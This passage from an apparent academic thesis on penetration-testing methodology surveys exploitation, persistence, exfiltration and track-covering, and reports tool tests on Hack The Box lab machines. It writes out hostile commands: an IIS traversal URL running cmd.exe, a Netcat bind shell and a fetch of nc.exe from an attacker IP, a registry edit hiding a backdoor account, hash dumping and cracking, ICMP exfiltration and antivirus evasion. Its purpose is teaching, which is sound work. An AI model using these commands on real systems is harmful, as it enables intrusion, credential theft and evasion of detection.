Exploitation and gaining access. Gaining access to target devices requires the

exploitation of vulnerabilities found during the discovery and enumeration phases. There are two

main classifications of attacks. The first is a direct attack where a target network’s vulnerabilities

are exploited to gain access to potentially critical systems, or to obtain information that can be

used to launch indirect attacks. The second is an indirect attack, which occurs when an attacker

uses sequential attacks to compromise the target/s. An example of this is spear phishing and

waterholing attacks (Sood & Enbody, 2014).

Patel (2013) references the Social Engineering Toolkit (SET), which is installed by

default on the Kali Linux distribution and is a diverse toolset for social engineering attacks. The

toolkit is capable of both creating emails, malicious attachments and creating/hosting phishing

web pages, also known as a web attack vector. SET contains a mass-emailing option where a

penetration tester can send a phishing email to many email addresses within an organization at

once (Patel, 2013).

The SET has a list of website templates that can be used as a web attack vector, but it is

also capable of cloning websites when a URL is provided. The tool performs a get request and

grabs the HTML code of the website, performing the cloning process based on that information.

Using tools like SET can assists in testing the employees of an organization and their ability to

recognize phishing email attempts. If a user were to give up their login credentials of a website,

such as their work Office 365 login, the penetration tester would have the user’s credentials for

their organization. If the user had administrative permissions, either locally on their computer or

23

on the domain, the penetration tester will be able to utilize those credentials to gain access to the

organization’s network (Patel, 2013).

When looking for information on a machine or for ways to access a machine, the tool

enum4linux is a great source for enumerating lightweight directory access protocol (LDAP) and

the server message block (SMB) service. Using valid non-administrative or administrative

credentials, it is possible to find an accessible SMB share and, depending on the permissions,

find a share that can be modified or even utilize to execute remote commands. If a domain

controller server is enumerated, the penetration tester could obtain a list of all active directory

(AD) users, groups, devices and shares. This is a step to perform either during enumeration

and/or post exploitation. If the tester does not have a username and password, it is still possible

to find shares and information open to the active directory (AD) group ‘everyone’. The

‘everyone’ group can be an AD or local group and allows anyone to access the resource it is

assigned to, regardless of whether they have an active directory account. In the instance of a file

share that allows members of the ‘everyone’ group to access, a tester can compromise the

security of the file share using enum4linux. If the tester has already exploited and compromised a

workstation and/or has credentials, those credentials can be used to discover and access more

shares on a network depending on the permissions of the compromised credentials. Output for

the enum4linux -help page can be found in Figure 4, located in Appendix B (Velu, 2017).

In the realm of exploitation, Metasploit is the most commonly used tool for executing

exploits against known vulnerabilities. There are two versions of Metasploit, Metasploit Pro

which is the paid version and requires a license, and Metasploit Framework which is a free

version and is automatically installed in all Kali Linux distributions. “Metasploit is currently the

world's leading penetration-testing tool, and one of the biggest open-source projects in

24

information security and penetration testing. It has totally revolutionized the way we can perform

security tests on our systems” (Teixeira, Singh, & Agarwal, 2018, p. 8). Rapid7, which is a

managed security services provider (MSSP) and security product vendor, owns Metasploit Pro

and Framework (Condon, 2019).

The Metasploit Framework (MSF) is broken up into directories of modules. Each

directory has modules that serve a specific purpose, whether it is scanning, auxiliary functions,

exploitation, or post-exploitation. When a penetration tester is trying to gain access to a device,

the extensive library of exploitation modules in Metasploit Framework is second to none. The

exploit database is constantly being updated with new modules. The command for updating MSF

is ‘msfupdate’. The tool can also be installed on Windows and MacOS (Teixeira, Singh, &

Agarwal, 2018).

Metasploit Framework modules are executed using the ‘use’ command and adding the

path of the module that is needed. MSF users can perform keyword searches of modules by

typing ‘search’ and then the keyword they are looking for. An example is typing

‘search SQL’ and hitting enter, which will list all of the modules that include SQL in the

name or in the description of the module. When executing modules, the settings of the module

need to be set before entering the command ‘run’. See Figure 5, located in Appendix B, for an

example of setting and executing a Metasploit module (Teixeira, Singh, & Agarwal, 2018).

Persistence and spreading. Spreading across the network includes gaining access to

other servers, workstations and whole networks once the penetration tester has gained access to

one or more devices. Persistence involves setting up a backdoor into the machine or machines for

future access.

25

EC-Council (2017) references Netcat in the book Ethical Hacking and Countermeasures:

Web Application and Data Servers. The Netcat chapter of the book provides the reader with

steps to setup up a backdoor on a compromised computer using either the TFTP port or through

an injected URL. An example is using Netcat to send a webserver the following URL:

http://192.168.0.1/scripts/...%255c./winnt/system32/cmd.exe?/c+dir+c:\ (EC-Council, 2017)The

URL asks the webserver to show the attacker the listings in the C drive utilizing Windows’

cmd.exe. Once the pen tester has established a command prompt on the target machine, the

TFTP port can be used to upload Netcat to the internet information service (IIS) server using the

following command: http://<attacker’sIP>/c+TFTP+i+192.168.0.1+GET+nc.exe (EC-Council,

2017).

The URL asks the tester’s computer for nc.exe, which is Netcat, and to import it to the

IIS server. Once Netcat is uploaded to the Internet Information Service (IIS) server, it can be

executed to become a backdoor by listening on a specific port for commands from the attacker’s

computer. An example of such a command is nc -L -p 12345 -d -e cmd.exe. Respectively, the

options mean to wait and listen for a connection on port 12345, close any connections on the

mentioned port, and to execute cmd.exe (EC-Council, 2017).

If there is a file share that is open, or if the penetration tester accessed a file share with

‘modify’ permissions, it is possible to import Netcat to the target device and execute a remote

shell. Once the penetration tester has accessed the target devices file share, the pen tester runs

one the following command on a Windows machine; nc -l -p 6996 -e cmd.exe. For a Linux

machine, the command is the same with the exception of cmd.exe, which is replaced with

/bin/bash. The command nc calls Netcat, the -l mean listen, -p 6996 means port 6996, -e cmd.exe

means to execute the mentioned file. This initiates Netcat to listen on the port and execute the

26

terminal or command prompt. Since Netcat is listening on port 6996 and would run the

commands it receives in the OS’s command line interface (CLI), the penetration tester would run

the following command on their device; nc <target IP> 6996. This initiates a Netcat connection

between the tester’s machine and the target machine (Yerrid, 2013).

Because IIS can have remote code execution vulnerabilities, depending on the version of

IIS running, the penetration tester could utilize the Netcat tool to gain access to the server and

establish a hidden persistence on a vulnerable server as part of a penetration test. This only gives

the tester the same permissions as the application running, thus a privilege escalation might be

required to gain administrative access to the Windows server (EC-Council, 2017).

Mimikatz is a well-known tool that can perform a multitude of functions to assist in

escalating privileges, gaining initial access, and gaining additional active directory information

regarding user accounts and group policies. Mimikatz is also known for its ability to perform the

infamous pass-the-hash function which exploits a vulnerability in the original NTLM that

required only the hash of the password to be correct instead of the password itself when

authenticating to Windows devices. It is not only important to understand how NTLM functions

and what tools can exploit its vulnerabilities but understanding how to use the tool is essential for

a penetration tester, and that is why author gives several other examples of the tool’s use in a real

scenarios (Sharma, 2017).

Clercq (2004) and Halton & Weaver (2016) explain the differences between LM, NT,

NTLMv1 and NTLMv2 hashes, and the tool syntax for John the Ripper and Hashcat for cracking

the mentioned hashes. Halton & Weaver (2016) explained the history of each hash and reviewed

steps for cracking the credentials in detail. NT hashes are the oldest hashes used for Windows to

authenticate to a domain and are more easily cracked due to their age and simplistic algorithm.

27

NTLM, also known as NTHash, is a little harder to crack, and is standard on most modern

Windows machines. Luckily, cracking this hash is not always necessary. NTLM’s most notable

vulnerability is the pass-the-hash technique where an attacker can simply sniff the hash and send

the hashed password to a device for authentication. The device will query the domain controller

with the hash to make sure the hashes match. If hashes match, then the credentials are accepted.

LM and NT are ways that Windows devices store passwords on the machine itself.

The commands to crack LM utilizing Hashcat and JTR are as follows:

Hashcat = hashcat -m 3000 -a 3 wordlist.txt (Steube, 2019)

John the Ripper = john –format=lm wordlist.txt (Halton & Weaver, 2016)

The Commands for cracking NTHash using Hashcat and JTR are as follows:

John the Ripper = john –format=nt wordlist.txt (Halton & Weaver, 2016)

Hashcat = hashcat -m 1000 -a 3 wordlist.txt (Steube, 2019).

NTLMv1, also known as Net-NTLM, is a protocol that allows Windows machines

authenticate to a domain. This is an older version of domain authentication and is now

deprecated, but older networks or networks with older hardware/software may still be using this

version. NTLMv2 is the more secure version and has been the default method used since

Windows 2000 (Clercq, 2004).

The commands for cracking NTLMv1 are as follows; John the Ripper = john –

format=netntlm wordlist.txt, Hashcat = hashcat -m 5500 -a 3 wordlist.txt. The commands for

cracking NTLMv2 are as follows; John the Ripper = john –format=netntlmv2 wordlist.txt,

Hashcat = hashcat -m 5600 -a 3 wordlist.txt (Steube, 2019).

Snood & Enbody (2014) explain the process of gaining and maintaining access to a

computer often does not require a direct attack. The authors explain the principles behind the use

28

of phishing emails to gain access to a target machine. In the spear phishing model that the author

presents, located in Appendix B as Figure 6, the attacker sends an email to the target user, but the

email contains malicious attachment/s that will infect the target computer with a RAT (Remote

Access Trojan). A RAT provides the attacker with a backdoor into the target machine. Once the

RAT is on the target machine, it will either spread itself across the target network, or the attacker

will utilize the RAT to spread more RATs across the network (Sood & Enbody, 2014).

If the attacker is not caught by an IDS/IPS, then they will eventually find a server that

holds sensitive data as they spread the RAT across the target network, and at that point, the

attacker will have the ability to exfiltrate sensitive data in a manner, which will allow the

attacker to elude detection. This completes the attack in the spear phishing method example, but

there are steps after exfiltration. One of the steps that usually follows exfiltration is covering of

tracks which includes deleting logs of the activity, removing any malware that was used to gain

access to the machine, and reversing any changes made to the machine’s configuration (Sood &

Enbody, 2014).

Another way to maintain persistence and exfiltrate data from a target device is to create a

new user account and add the account to local and domain groups. This will help the penetration

tester blend-in with the rest of the activity happening on the computer. The account will want to

be hidden, and in order to hide the new account, the following registry edit needs to be

performed; Reg Add

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion

\WinLogon\SpecialAccounts\UserList /V account_name /T REG_DWORD /D 0. The registry

path can vary depending on the version of Windows running on the target machine, but the

general idea is the same (Velu, 2017).

29

Data gathering and extraction. Netcat can exfiltrate data from a target device. In order

to perform this function, the Netcat remote shell needs to have a connection to the attacker’s

computer. The penetration tester also needs to know the path to the folder where the file needing

to be exfiltrated rests on the target device. In order to import the file, the ‘tail’ command is used.

For example, if a penetration tester wanted to dump the Linux passwd file, they would run the

following command; tail /etc/passwd (Yerrid, 2013). In turn, the attacker can crack the password

file offline and at their leisure.

An issue with data exfiltration is the risk of being caught by data loss prevention.

Random access memory (RAM) holds a significant amount of information for an attacker. Tools

like Belkasoft RAM Capturer and MandiantMemoryze can capture system memory, which

allows it to be downloaded as a single image file. Both tools are uploaded to the compromised

machine and used to perform the download of the system’s memory (Velu, 2017).

If a penetration tester is trying to capture the active memory of a target, they would most

likely get caught by endpoint protection. In order to avoid this, Metasploit’s Meterpreter has

commands that can run the executable completely in the target machine’s memory using the

following command; execute -H -m -d calc.exe -f. The command runs the calculator app

(calc.exe) as a decoy executable and will upload the memory acquisition program in the system’s

memory. Because a dummy program executes the memory acquisition program, it avoids anti-

virus. The memory acquisition program does not show up as a running process because it is run

in system memory, which assists in avoiding IDS/IPS (Velu, 2017).

When exfiltrating information from a target on an organization’s domain, the security

account manager (SAM) database is a prime target. The SAM database contains the usernames

and passwords for the Windows operating system. The passwords are stored as LM or NTLM

30

hashes in the registry hive. The file path for the SAM is %SystemRoot%/system32/config/SAM,

and the file share for the SAM is mounted at HKLM/SAM (Teixeira, Singh, & Agarwal, 2018).

Metasploit has a module called Smart Hashdump that can import the password hashes

from the SAM database to the penetration tester’s machine where the tester can crack hashes

offline. Once the meterpreter shell is running on the target device and the shell has been placed

in the background of the tester’s terminal, the tester can run the Smart Hashdump module at the

following Metasploit path; post/windows/gather/smart_hashdump. Once the module settings

have been set and the module has finished running, the Windows password hashes are placed

into a file on the tester’s machine (Teixeira, Singh, & Agarwal, 2018).

Lastly there is the data exfiltration toolkit (DET), which is a tool designed to test data

loss prevention (DLP). DET can exfiltrate data using different protocols and social media such as

Gmail and Twitter. DET uses a client-server architecture, so a server needs to be setup on the

tester’s machine and then a client needs to be installed on the target machine. Valu (2016)

provides the steps for downloading and configuring the DET tool for use. The tool is

downloaded from GitHub using the command ‘git clone https://github.com/sensepost/DET.git’.

Once the repository is cloned and the tester has navigated to the directory, the tester can use the

command ‘pip install -r requirements.txt’ and then the command ‘python det.py’ to complete the

installation of the tool. This is necessary because DET is not installed on Kali Linux by default

(Velu, 2017).

The tester can start the DET server using the following command; python det.py -c

./config-sample.json -p icmp -L. This command starts the server with the configuration set to

listen for packets over Internet control message protocol (ICMP). The config-sample.json in the

command is the configuration file. Once the setup is complete, the tester can exfiltrate data from

31

the target over ICMP protocol, which will obfuscate the traffic by making it look like a ping,

which helps evade DLP (Velu, 2017).

Covering tracks. Removing evidence and indicators of compromise is the second to last

step of a penetration test. Log deletion and removal of installed software is part of covering the

tracks left by a penetration test. Log deletion during the penetration test is part of maintaining

stealth on the network to IDS and IPS (Allen & Cardwell, 2016).

When cleaning up log files and modifying registry settings and values are important

when trying to avoid detection. Deletion of a log file is more suspicious than a modification of a

log file, especially if the modification is performed with system level permissions on a Windows

server, or root permissions on a Linux device. It is advisable to modify logs instead of deleting

them (Allen & Cardwell, 2016).

Removing software, programs, script files and applications used for testing is also an

important step because the software could be used in the future by malicious attackers to

compromise the organization. Leaving the network clean and pristine once testing concludes

shows the organization that the tester possesses professionalism and attention to detail. A

common issue faced during post-test clean-up activities is remembering everything that needs to

be removed or reconfigured. Keeping detailed records and logs of the test, including what

software, programs, script files and applications placed on the target devices, will assist in

cleanup after testing has concluded. Detailed records also assist in creating the penetration test

report for the organization (Allen & Cardwell, 2016).

Discussion of the Findings

The purpose of this research was to provide guidance regarding the steps for performing a

penetration test using the most common open-source tools in the three main fields of penetration

32

testing; wireless, web application, and Intranet. This guidance is for those who possess a deep

understanding of the technical aspects of IT, are passionate about cybersecurity and want a

starting framework that they can utilize in the development of their own penetration testing

methodology.

In order to demonstrate the benefits of these tools, thy need to be tested. In this section,

the tools that are tested are: Nmap, ZAP, Nikto, Metasploit, enum4linux, and OpenVAS. I used

devices in hackthebox.eu: 10.10.10.169, 10.10.10.168 and 10.10.10.157. 10.10.10.168 and

10.10.10.157 use Linux operating systems. 10.10.10.169 is a Windows device.

Wireless Tool Benefits

The Aircrack-ng toolset and Kismet tool are the two most commonly used toolsets for

wireless penetration testing given their wide range of capabilities and easy-to-use command line

interfaces. Aircrack-ng hosts multiple tools within its toolset that perform different functions

regarding wireless security testing, credential harvesting and end-point compromise.

Kismet is another wireless security tool known for its ability to assess the security

protocols of wireless networks without connecting to them, as well as identifying networks that

are not on the IEEE 802.11 standard spectrum.

Web Application Testing Results

In web application security testing, there are four main tools used; OWASP’s ZAP,

Nikto, SQLMap, and Burpsuite. Each tool is special in its capabilities and user interface. ZAP

and Burpsuite utilize a graphical user interface (GUI) where SQLMap uses a CLI. Zap uses both

automatic and manual web application security scanning, while Burpsuite utilizes manual testing

as a proxy between the tester’s browser and the web application. ZAP and Burpsuite focus on the

web application security testing in a broad sense, where SQLMap focuses on SQL vulnerabilities

33

within the web application. These are the most commonly used tools for web application security

testing and penetration testers will be required to familiarize themselves with these tools and how

they function in order to be a well-rounded tester.

The first tool tested for web application security was Nikto. To run the initial scan, the

first command was ‘Nikto –host 10.10.10.157’. The default port is 80 for Nikto if there is not a

specified port in the command. Port 80 was found to be an open port during the Nmap scan that

was run during discovery and enumeration in the next section. The results of the Nikto scan are

shown in Figure 7.

Figure 7. Nikto Command and Output From a Generic Scan

Nikto found that the Apache version is out of date and could contain vulnerabilities that a

tester can research online. The Nikto scan also displays the types of HTTP methods that the web

application allows. The HTTP POST method can be a vulnerability if there were a login for that

website where password spraying may occur.

ZAP testing resulted in the discovery that the new Kali Linux version does not contain

ZAP by default, so to install ZAP, the following command must be used ‘apt-get install owasp-

zap’. Once the installation was complete, the command ‘owasp-zap’ started the program. From

34

the home screen, the automated scan was selected, which was where the specifics were entered.

See Figure 8 for a screenshot of the configuration page. See figure 8 and 9 for the results of the

scan.

Figure 8. ZAP Automated Scan Configuration Screen

Note: This screenshot illustrates the input of variables into the scan configuration screen.

35

Figure 9. ZAP Automated Scan Results

Note: This figure illustrates the results of the scan and the tabbed options that show various other

result information.

ZAP searches for known common URL paths and presents the findings, which can be

sorted for convenience. An example would be Figure 9, which shows the column ‘Reason’ sorted

to show the ‘OK’ reason at the top. This mean that the URL exists and returned results when

tested. Much like Nikto, ZAP scans for many URLs and other criteria to present.

Intranet Security Testing Results

The tools for Intranet testing depend on the stage of testing that the penetration tester is

working. The stages of a penetration test are discovery, enumeration, exploitation, privilege

escalation, persistence, covering tracks, and reporting (Ali, Allen, & Heriyanto, 2014). Each

stage has a set of tools that work best for what the analyst is trying to accomplish.

Nmap is the most recommended tool for discovery scanning and vulnerability

enumeration. Nmap has been around since 1997 and has been improved over the years so it can

perform a wide range of functions. Syntax for the tool is straight-forward and there is no

shortage of resources that can guide a new penetration tester to the best scan for the environment

they are testing. Between live asset discovery, open port scanning, service version detection, OS

fingerprinting, built-in scripts and scripting capabilities, there are few operations this tool cannot

perform (Lyon, 2008).

When testing Nmap, a tester must perform scans of devices on a network. The first

command run was ‘nmap –v –p- 10.10.10.157 –oG 157portscan.txt’. This scans all of the ports

on the device and outputs the results to the 157portscan.txt file. Once Nmap displayed the open

36

ports in the output, a service version scan was run that also obtains the info for the OS and runs

Nmap scripts. See Figure 10 for Nmap command and results.

Figure 10. Nmap device enumeration command

Note: This figure illustrated the command switches that identify the service version of the listed

ports and operating system.

As shown in Figure 8, the Apache version of the web server running on port 80 is 2.4.29.

This seems like a lower version of Apache and a penetration tester will be able research that

version of Apache to find known vulnerabilities.

OpenVAS is also a well-known scanning tool used specifically for vulnerability detection

and exploit recommendations. It can perform automated scanning and will display vulnerability

information. This is more detail than Nmap, which displays raw information that the tester must

research to determine if there are vulnerabilities. When enumerating with Nmap, success boils

down to a penetration tester’s familiarity with known vulnerabilities corresponding to different

service versions, and their understanding of how these services function different ports.

In this example, OpenVAS can be installed using the command ‘apt-get install openvas’.

Once OpenVAS is installed, it needs to be setup using the command ‘openvas-setup’. After setup

is complete, the login password and username will appear at the bottom of the page terminal, and

37

the web user interface (UI) for URL https://127.0.0.1:9392 was loaded. Since the login

information was provided during setup, it is easy to login to the web UI. To start a scan, click on

the scan tab at the top of the page, click on the tasks option in the dropdown menu, and then click

on the purple task manager icon on the on the top left side (see Figure 11 for a screenshot).

Figure 11. How to Start a Scan in OpenVAS

Note: This illustrates the icons to click to start a scan in OpenVAS

The scan status is illustrated at the bottom of the page and the tool is set to refresh every

30 seconds. This begins the OpenVAS vulnerability scan of the IP 10.10.10.157. When the scan

was finished, the status of the scan changed from ‘Requested’ to ‘Done’, which allows the user

to view the vulnerability results as shown in Figure 12. The vulnerabilities will allow a tester to

determine what offensive actions can be taken to compromise the system.

38

Figure 12. Results from OpenVAS Scan

Note: This illustrates the list of vulnerabilities found from the scan of the IP address

10.10.10.157 in OpenVAS

When working on enumeration, enum4linux is a reputable resource. When performing

discovery scanning, it was determined that 10.10.10.169 has lightweight directory access

protocol (LDAP) running, which is how Windows authenticates credentials on a domain. Using

enum4linux with no passwords given and the –a modifier, making the command ‘enum4linux –a

10.10.10.169’, the scan returned valuable data. The most important data was the list of users in

the AD group ‘Domain Users’. See Figure 13 for the screenshot of this output.

39

Figure 13 - Enum4linux LDAP Output

Note: This lists the user accounts found in the active directory group ‘Domain Users’ during the

enumeration of LDAP using enum4linux

In addition to the list of users in the ‘Domain Users’ group, there was the list of all users

within the entire domain. See Figure 12 for the screenshot of all users. Other information

provided by this tool is the password policy for the domain “megabank”, which is the domain for

the server. See Figure 13 for the password policy screenshot. It shows the list for all of the user

accounts found on the machine with IP 10.10.10.169 during LDAP enumeration.

40

Figure 14. Enum4linux Users Output

Note: This screenshot lists all the user accounts found on 10.10.10.169 during LDAP

enumeration

41

Figure 15. Enum4linux Password Policy Output

Note: This figure illustrates the fact that the password policy can be found in the output of the

LDAP enumeration using enum4linux

Enum4linux is a useful tool that can provide valuable information when used correctly.

Once the target is known and enumerated, exploitation and gaining access to the machines are

the next steps. When it comes to exploitation, Metasploit is second to none. Metasploit is the

most commonly used tool for exploiting vulnerabilities, as it has pre-configured exploit modules

that were designed to exploit specific vulnerabilities. This allows for exploit automation and the

capability for a less-advanced penetration tester to perform exploitation of vulnerabilities that

would otherwise would not have had the technical capabilities to perform. The tool also includes

modules for scanning, enumeration, exploitation and post-exploitation.

Post-exploitation and persistence are part of what allows a penetration tester to continue a

test after initial exploitation and access a machine. This includes privilege escalation, moving

laterally to other machines across the intranet, monitoring and logging on devices, and the

42

creation of backdoors for future access. Because of the multitude of tasks involved, there are

tools designed to assist in the performance of each specific task, and can sometimes be

dependent on the OS of the compromised machine.

Obtaining and using passwords found on a machine is one way to gain access while

remaining anonymous on the network. Utilizing authorized credentials allows for easier access to

a machine remotely by installing backdoors, but it also allows the penetration tester to look at

file shares and the security account manager (SAM) database without arousing suspicion. This is

a very important step in the penetration testing methodology for initially obtaining and

maintaining access. Domain user accounts provide access to any computers and file shares that

the domain user has access to, which is beneficial for spreading across the network. A domain

administrator account provides more access to all of the devices on the organization’s domain,

including administrative permissions to all of the servers and workstations.

Netcat can be used as a backdoor and for data exfiltration. Metasploit’s Meterpreter is

also used for creating and maintaining a backdoor on to the machine. Meterpreter includes

stealth capabilities by executing commands using dummy processes and having those processes

use the Windows command shell in the background for executing commands remotely. This is

one way of bypassing anti-virus (AV) and IDS. Meterpreter also has a module called Smart

Hashdump that can download the local running memory of the machine for analysis. Other open-

source tools in Kali Linux are made for downloading local memory, such as Belkasoft RAM

Capturer and Mandiant Memoryze. Lastly, the Data Exfiltration Tool (DET) is specifically made

for exfiltrating data discretely and was designed for data loss prevention (DLP) testing.

Remaining undetected is critical for a penetration tester and each tool has functions

designed to assist in obfuscation and stealth. Tools are not enough to remain undetected when

43

performing a penetration test. A penetration tester must use knowledge of networking and OS

operations and configurations in order to stay hidden from IDS/IPS. Creating legitimate local and

AD accounts for persistence will reduce the likelihood that future activities will be viewed as

suspicious by a security incident and event manager (SIEM) or user behavioral analytics (UBA).

After the penetration test completes, it is important to remove anything on the

organization’s network and systems that have not been removed already. This includes deleting

any accounts created, resetting any permissions and registry keys modified, and removing any

software or files/folders placed on devices. Cleaning up and removing anything that could be

used by a real attacker in the future is part of the penetration testing process and should never be

skipped or taken lightly. The purpose of a security analysis and penetration test is to benefit the

organization by highlighting security weaknesses, thus increasing the organization’s security

posture. When an analysis or test placing the organization at greater risk, it constitutes a failure

of that test and of the testers.

Commonalities

There were several commonalities that were found between the different penetration

testing sections and toolsets. According to the Literature Review, the first step in any penetration

test is intelligence gathering, regardless of which portion of an organization is being tested.

Knowing as much about the organization’s operations, people, and threat vectors is necessary for

a strong beginning to a penetration test. OSINT is the practice of gathering information from

open-source tools and platforms, such as social media and search engines. Social engineering is

one of the main reasons for performing OSINT, as it may be useful to know certain personal

information in order to craft a social engineering attack that has the highest chance of

successfully obtaining sensitive information. A penetration tester can easily compromise an

44

organization by tricking one of their employees into opening a malicious attachment containing

custom malware. This could compromise the machine and give the penetration tester credentials

that they could use to perform other penetration tests, such as wireless or intranet testing.

Another commonality was the penetration testing tools used for different testing fields. In

both wireless network security testing and intranet security testing, decryption or hash-cracking

was required for various reasons. John the Ripper (JTR) was suggested for hash-cracking and

decryption in both wireless and physical network security as it has the capability to crack

encryption and hashes for both passwords and wireless security protocols. JTR was also

suggested for cracking the hashes of Windows credentials taken from a compromised machine.

There are also areas where testing fields become sub-tasks for one another. For example,

there may be web applications discovered during in an intranet a penetration test. Organizations

often use web portals for corporate tool and resource logins, such as SolarWinds’ Orion network

solution. Orion can be used as an organization’s IP Address Management (IPAM) resource,

which would allow the tester to view what each subnet of the company’s intranet is used for, and

even view what devices are using which IP address within those networks. This would allow the

tester to focus on the high-value targets, such as the domain controller (DC), the domain name

server (DNS), database servers and others.

One tool that mixes wireless security testing and end-point compromise is Aircrack-ng.

Aircrack-ng allows for the performance of a man-in-the-middle attacks that could either

compromise a workstation or get credentials from the user. Credentials phished from a user using

a fake wireless logon page, could be used during intranet security testing when the penetration

tester wants to perform privilege escalation or move laterally across the network.

45

Web application, wireless and Intranet testing merge when a web application has been

compromised, which can provide credentials to access a wireless network where Intranet testing

can begin. Compromising Internet-facing web applications can also provide access to the web

server itself, which in-turn can provide the tester with access to an internal network depending on

the way the organization has their web servers networked.

Many variables determine the paths that an analyst takes during a penetration test. There

are several points where wireless testing, web application testing, and intranet testing intersect

during a fully scoped penetration test. Having a good toolset, along with in-depth knowledge of

those tools, will provide a penetration tester with the ability to perform the test and be successful.

For wireless testing, Kismet and Aircrack-ng tool suite are the tools that will provide the best

results. ZAP, Nikto, SQLMap and Burpsuite are the best tools for testing web application

security. Nmap, OpenVAS, Metasploit, Meterpreter, Netcat, and DET are comprehensive tools

that will provide the best results during the first five stages of an intranet penetration test.

Keeping detailed records and logs of the penetration test is the best practice for successfully

performing the final two stages of a penetration test.

Conclusion

A lack of advanced knowledge and experience of cybersecurity technologies and

concepts are the main factors that keep information technology professionals away from the

cybersecurity industry. Knowledge of advanced information technology functions and familiarity

with cybersecurity processes and technologies are required to begin a career in cybersecurity.

Knowing where to begin can be difficult, and there are many separate but beneficial sources

containing information about cybersecurity processes and technologies. Few sources have

46

combined information into a penetration testing template with tool use and syntax for performing

a penetration test.

There is no shortage of tools available for security and penetration testing. Many tools

have enough functionality, but not all of the tools are user-friendly or cover a wide range of

functions. Some tools are specifically designed to test one aspect of an environment, such as

wireless networks or SQL. Other tools can perform multiple functions, such as Nmap, which

performs network discovery and enumeration, or Metasploit that can perform functions at every

stage of the penetration testing process. Some tools are more commonly used and more popular

than others, depending on their effectiveness. Because those tools are often more effective, it is

beneficial for a prospective penetration tester or security analyst to learn the purpose, scope, and

syntax for each of these tools. Not all the tools and toolsets are executed using the command line,

but familiarity with the tool’s capabilities and operation are required for effectiveness.

Understanding a tool’s capabilities and operations are only part of the process of a

penetration test. An analyst must know the penetration testing process through standards and

authoritative sources. The penetration testing standard is a guide that can help a new tester with

the methodology and mindset required to perform a thorough and successful test and analysis of

an organization’s information systems security. The ability to be inquisitive, read logs and

investigate leads are a penetration tester’s personal strengths and skills outside of their toolsets.

Security analysis and testing is a job for those who have a passion for cybersecurity work.

An ability to think outside of the box is required when searching for vulnerabilities that everyone

else has yet to find. The tester’s tools are their arsenal, which allows them to use their

knowledge, inquisitiveness, and passion to perform an analysis and penetration test.

47

There are always going to be new technologies being used by organizations around the

world, and technology is always going to evolve. A pen tester must constantly learn about new

technologies that are available and be ready to perform an analysis and test those devices,

programs, protocols and processes. Knowledge, experience, passion, inquisitiveness, and an

understanding of the toolsets will begin a career in cybersecurity. Continuous education is the

key to a career in cybersecurity.

48

References

Ahmadzadeh, A., Hajihassani, O., & Gorgin, S. (2017). A high-performance and energy-efficient

exhaustive key search approach via GPU on DES-like cryptosystems. The Journal of

Supercomputing.

Ali, S., Allen, L., & Heriyanto, T. (2014). Kali Linux – Assuring Security by Penetration Testing.

Birmingham, UK: Packt Publishing.

Alisherov, F., & Sattarova, F. (2009). Methodology for Penetration Testing. Sandy Bay,

Tasmania, Australia: International Journal of of Grid and Distributed Computing.

Allen, L., & Cardwell, K. (2016). Penetration Testing Execution Standard. Birmingham, UK:

Packt Publishing.

Andress, J., & Winterfeld, S. (2014). Cyber Warfare Techniques, Tactics and Tools for Security

Practitioners. Waltham: Syngress.

Aruba Networks. (2019). Working with Intrusion Detection. Retrieved from Aruba Networks

Tech Docs:

https://www.arubanetworks.com/techdocs/ArubaOS_63_Web_Help/Content/ArubaFrame

Styles/New_WIP/Intrusion_Detection.htm#new_wip_1365762209_1030491

Bahybars-Hawks, B. (2015). New Media Politics: Rethinking Activism and National Security in

Cyberspace. Newcastle, UK: Cambridge Scholars Publishing.

Beggs, R. (2017). Mastering Kali Linux for Advanced Penetration Testing (Second ed.).

Birmingham, UK: Packt Publishing.

Bjetlich, R. (2013). The Practice of Network Security Monitoring: Understanding Incident

Detection and Response. San Francisco, California, United States: The Starch Press.

49

Broad, J., & Bindner, A. (2014). Hacking with Kali : Practical Penetration Testing Techniques.

Waltham: Syngress.

Clercq, J. d. (2004). Windows Server 2003 Security Infrastructure: Core Security Features.

Amsterdam, Netherlands: Digital Press.

Condon, C. (2019). Metasploit Framework. Retrieved from GitHub:

https://github.com/rapid7/metasploit-framework/wiki

Crumpler, W., & Lewis, J. A. (2019). The Cybersecurity Workforce Gap. District of Columbia:

Center for Strateic & International Studies. Retrieved from

https://virginiacyberalliancecareers.org/wp-content/uploads/190129_The-Cybersecurity-

Workforce-Gap.pdf

Cylance Data Science Team. (2017). Introduction to Artificial Intelligence for Security

Professionals. Irvine: The Cylance Press.

Duric, Z. (2014). WAPTT - Web Application Penetration Testing Tool. Advances in Electrical

and Computer Engineering. Retrieved from Directory of Open Access Journals.

EC-Council. (2017). Ethical Hacking and Countermeasures: Web Applications and Data Servers

(Second ed.). Boston, MA: Cengage Learning.

EC-Council Press. (2017). Ethical Hacking and Countermeasures: Attack Phases (Second ed.).

Boston: Cengage Learning.

Engebreston, P. (2013). The Basics of Hacking and Penetration Testing : Ethical Hacking and

Penetration Testing Made Easy. Waltham: Syngress.

Fadyushin, V., & Popov, A. (2016). Building a Pen testing Lab for Wireless Networks.

Birmingham, UK: Packt Publishing.

50

Ford, V. (2017). Build Your Own Lab. Retrieved from National Cybersecurity Student

Organization: https://www.cyberstudents.org/blog-post/build-your-own-lab/

Gregg, M., & Watkins, S. (2006). Hack the Stack : Using Snort and Ethereal to Master The 8

Layers of An Insecure Network. Rockland, MA, United States: Syngress.

Hack the Box. (2019). About. Retrieved from Hack the Box: https://www.hackthebox.eu/

Halton, W., & Weaver, B. (2016). Kali Linux 2: Windows Penetration Testing. Birmingham,

UK: Packt Publishing.

IBM. (2019). Data Breach. Retrieved from IBM Security : https://www.ibm.com/security/data-

breach

Identity Theft Resource Center. (2018). 2017 Annual Data Breach Year-End Review. Retrieved

from ID Theft Center: https://www.idtheftcenter.org/2017-data-breaches/

IEEE. (2019). 802.11 Standard Details. Retrieved from IEEE Standards Association:

https://standards.ieee.org/standard/802_11-2016.html

International Information Systems Security Certification Consortium. (2018). Cybersecurity

Professionals Focus on Developing New Skills as Workforce Gap Widens. Retrieved

from ISC2: https://www.isc2.org/-/media/ISC2/Research/2018-ISC2-Cybersecurity-

Workforce-

Study.ashx?la=en&hash=4E09681D0FB51698D9BA6BF13EEABFA48BD17DB0

Johns, A. (2015). Mastering Wireless Penetration Testing for Highly Secured Environments.

Birmingham, UK: Packt Publishing.

